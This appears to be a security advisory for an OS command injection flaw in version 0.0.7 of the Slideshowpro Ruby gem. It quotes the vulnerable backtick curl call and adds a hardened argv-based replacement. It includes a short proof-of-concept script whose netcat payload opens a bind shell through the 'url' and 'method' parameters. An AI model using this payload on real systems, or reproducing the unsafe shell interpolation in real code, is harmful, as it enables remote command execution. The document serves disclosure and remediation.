Description
The Ruby gem Slideshowpro version 0.0.7 may be vulnerable to OS command
injection in the './lib/slideshowpro/director.rb' file if the application using
it allows a user to control the 'url' parameter during class initialization or
the 'method' parameter during a call to the 'post' function.
Proof of concept
The following proof of concept is available:
#!/usr/bin/env ruby
require "rubygems"
require "bundler/setup"
require "slideshowpro"
payload = 'nc -l -p 1337 -e /bin/sh'
# create object #
ssp = Slideshowpro::Director.new('http://localhost/\";'+payload+';echo \"', '')
# trigger exploit #
poc = ssp.post(';'+payload+';#', {})
Vulnerable code
The 'post(method, options)' function in './lib/slideshowpro/director.rb' passes
both the local function parameter 'method' and the public object property 'url'
to the protected function 'get_json(url, method, data)' on lines 24, 29 and 32:
rescue Memcached::NotFound
json = get_json(url, method, data) # line 24
self.cache.set(data_key, json)
rescue Memcached::ServerIsMarkedDead
puts "Memcache Down!"
#fall back to get data directly
json = get_json(url, method, data) # line 29
end
else
json = get_json(url, method, data) # line 32
The protected function 'get_json(url, method, data)' interpolates the local
function parameters 'url' and 'method' (and 'data') into a backtick command
string on line 68, so the concatenated value is parsed by the shell:
def get_json(url, method, data)
puts "requesting #{url+method} with #{data.inspect}" if $debug
response = `curl --silent #{url+method} --data "#{data}"` # line 68
puts "recieved: #{response}" if $debug
Crack::JSON.parse(response)
end
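A hardened replacement for the backtick call above, added here as an example; it is not code from the slideshowpro gem. It assumes 'method' is a plain path segment (validated with a regex that is an assumption, not the gem's own rule) and passes curl an argv array, so no shell ever sees 'url', 'method' or 'data'.

```ruby
require "json"
require "open3"
require "uri"

# Assumed shape of a Director API method name: word characters, '/', '.', '-'.
# Anything carrying shell metacharacters (';', '"', '#', '`', '$', ...) is rejected.
METHOD_PATTERN = /\A[\w\/.-]+\z/.freeze

# Validate both halves before concatenating them, as the original does with url+method.
def build_endpoint(url, method)
  unless method.is_a?(String) && method.match?(METHOD_PATTERN)
    raise ArgumentError, "method not allowed: #{method.inspect}"
  end
  uri = URI.parse(url.to_s) rescue nil   # URI::InvalidURIError for '"', spaces, etc.
  unless uri.is_a?(URI::HTTP)            # URI::HTTPS is a subclass of URI::HTTP
    raise ArgumentError, "url must be http(s): #{url.inspect}"
  end
  url + method
end

# Each element is one literal argument to curl. A value such as '"; id; echo "'
# stays a single string and is never interpreted by /bin/sh.
def curl_argv(url, method, data)
  ["curl", "--silent", "--data", data.to_s, build_endpoint(url, method)]
end

def safe_get_json(url, method, data)
  argv = curl_argv(url, method, data)
  out, status = Open3.capture2(*argv)    # argv form: direct spawn, no shell
  raise "curl failed (exit #{status.exitstatus})" unless status.success?
  JSON.parse(out)
end

if $PROGRAM_NAME == __FILE__
  p curl_argv("http://localhost/", "getAlbums", '"; id; echo "')
  # => ["curl", "--silent", "--data", "\"; id; echo \"", "http://localhost/getAlbums"]
end
```

Because 'safe_get_json' needs a reachable endpoint, the stand-alone run only prints the argv it would spawn; the rejection of a crafted 'url' or 'method' is raised as ArgumentError before any process starts.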